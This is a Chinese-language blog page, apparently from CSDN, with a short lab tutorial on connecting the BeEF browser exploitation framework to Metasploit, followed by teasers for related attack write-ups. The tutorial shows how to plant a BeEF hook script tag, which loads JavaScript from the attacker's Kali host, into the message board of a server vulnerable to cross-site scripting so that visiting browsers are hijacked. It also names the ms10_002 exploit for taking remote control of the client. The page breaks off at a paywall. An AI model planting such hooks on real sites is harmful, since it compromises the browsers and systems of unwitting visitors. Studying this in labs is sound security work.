beef +metasploit关联

最新推荐文章于 2023-01-19 15:54:06 发布
最新推荐文章于 2023-01-19 15:54:06 发布
阅读量395 收藏
点赞数
分类专栏: 教程 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41343528/article/details/119054257
版权
本文档总结了如何将Beef与Metasploit关联,以利用XSS漏洞控制客户端系统。首先,配置Beef的Metasploit模块,然后启动Metasploit框架和PostgreSQL数据库服务。接着,搜索并利用ms10_002漏洞,设置攻击载荷,通过Beef生成的恶意代码植入到存在XSS漏洞的服务器,当客户端访问时,触发漏洞,实现远程控制。
摘要由CSDN通过智能技术生成

参考了网络很多大神文章,简单小结一下,仅供参考
1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true
2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip
3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole
4,msf终端内输入命令 load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 //ServerHost为kali ip,User&Pass为2步骤配置的账号密码
5,修改beef默认账号密码, vim /etc/beef-xss/config.yaml //修改 User:beef,Password:beef
6,启动beef, beef-xss
1.Kali:IP:192.168.126.140
2.web服务器IP:192.168.126.205 存在XSS跨站脚本漏洞
3.客户端IP:192.168.126.130
4.Kali使用beef生成恶意代码网络
5.浏览器输入 http://127.0.0.1:3000/ui/panel,登陆beef,Usename与Password均为beef
6.将Hook URL “<scriptsrc=“http://1192.168.126.140:3000/hook.js”>”写入存在XSS漏洞的web服务器文本框
7.只要客户端访问服务器192.168.126.205留言板,客户端浏览器就会被劫持框
service postgresql start //启动msf数据库
msfconsole //启动msf
8.

最低0.47元/天 解锁文章
bingxinid
关注
专栏目录
beef +metasploit关联拿shell教程
Johnathan的博客
03-01 679
参考了网络很多大神文章,简单小结一下,仅供参考 手动关联 beef + msf 1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true 2,配置vim /usr/share/beef-xss/...
Metasploit+Beef整合攻击——超详细
一个懒鬼的博客
05-10 2196
文章目录 前言 一、准备工作 1.配置beef 2.配置Metasploit 二、实际操作 三、Beef隧道代理 总结 前言 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,beef属于c/s结构,具体看图 zombie(僵尸)即受害的浏览器。
kali下BeEF联合Metasploit
weixin_45524984的博客
12-02 300
kali下BEeF联合Metasploit Metasploit大概就是一个可以用很厉害的工具之类的…… 前几天玩KALI的时候见到有朋友联合BEeFMetasploit,这样就可以在BEeF里面用Metasploit啦!这篇文章很受用: kali下安装beef并联合Metasploit 原文有两个地方要注意 1、运行beef时不要把Metasploit关掉啊QAQ! 2、Metasploit的load msgrpc ServerHost=x.x.x.x Pass=abc123这里,这个abc123时默认
Metasploit中配置beef
MickeyMouse1928的博客
04-08 1284
Metasploit中配置beef cd /usr/share/beef-xss/ 打开beef-XSS目录下config.yaml文件leafpad config.yaml 修改metasploit的false为true 继续打开beef-XSS目录下extensions/metasploit文件夹 cd extensions/metasploit/ leaf
BeFF&&Metasploit&&Venom
自学编程_youkewang.top
03-14 888
这几天学习了BeFF,发现是个很牛逼的XSS平台,感觉Kali上面的工具都很牛逼;在网上看了很多文档,几乎都是BeFF结合MSF入侵XP的文章,觉得没什么创新,于是就有了这篇文章。测试环境:Kali,Win7,Venom思路:1.使用Venom生成免杀的bat文件用作后门.2.Kali开启apache并在网页中嵌入Hook地址。3.BeFF控制被劫持浏览器访问恶意地址;这里我使用Msf中的brow...
利用Beef获取目标主机用户名与密码:实战教程
- 配置beef,首先在MSF(Metasploit Framework)控制台上关联beef,通过编辑`config.yaml`文件,启用所需的模块,并指定回调服务器地址为Kali主机的IP地址(192.168.1.2)。 2. **利用beef获取shell**: - 启动...
【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架
edu_aqniu的博客
09-30 4914
存储型XSS                                                               长期存储于服务器端                                            每次用于访问都会被执行javascript脚本                    Name:客户端表单长度限制           
xss利用之kali神器beef
热门推荐
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。
beef+metasploit配置方法
weixin_33774615的博客
11-22 943
2019独角兽企业重金招聘Python工程师标准>>> ...
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
kali下安装beef并联合Metasploit
qwertyuii的博客
06-02 314
kali下安装beef并联合Metasploit
Kali下beEF关联metasploit的攻击模块
jiangliuzheng的专栏
01-14 1654
 Kali下beEF关联metasploit的攻击模块 工具/原料 kali Linux 方法/步骤 1 首先我们需要了解下beEFmetasploit的几个目录,beEF的目录在:/usr/share/beef-xss下,metasploit的两个目录分别是:/opt/metasploit 和/usr/share/
【甄选靶场】Vulnhub百个项目渗透——项目五十五:SP-LEOPOLD v1.2(beef联动msf,脏牛提权)
最新发布
人间体佐菲的博客
01-19 1494
【甄选靶场】Vulnhub百个项目渗透——项目五十五:SP-LEOPOLD v1.2(beef联动msf,脏牛提权)
2021/12/06 XSS跨站之订单和shell箱子反杀记,beef
weixin_44532761的博客
12-07 430
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=25 涉及资源 https://github.com/tennc/webshell https://www.postman.com/downloads/ 订单系统XSS盲打-平台 安装网站 有了前人的教训,先删除了源码install的/install.lock 数据库报错 年????,后台进不去,一看验证码加载不出来,而且路径也不对,把lib放进admin试试 ahhhhh鸡汤…不玩了,打开还
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1182
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
Kali Linux下BeEF钓鱼网站实战与Metasploit渗透教程
文档首先介绍了如何在BeEF(Browser Exploitation Framework)框架下构建钓鱼网站,这是一种自动化工具,用于控制并操纵浏览器,常用于进行社会工程学攻击。 攻击者通过创建一个与可信网站外观相似的钓鱼页面,图...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值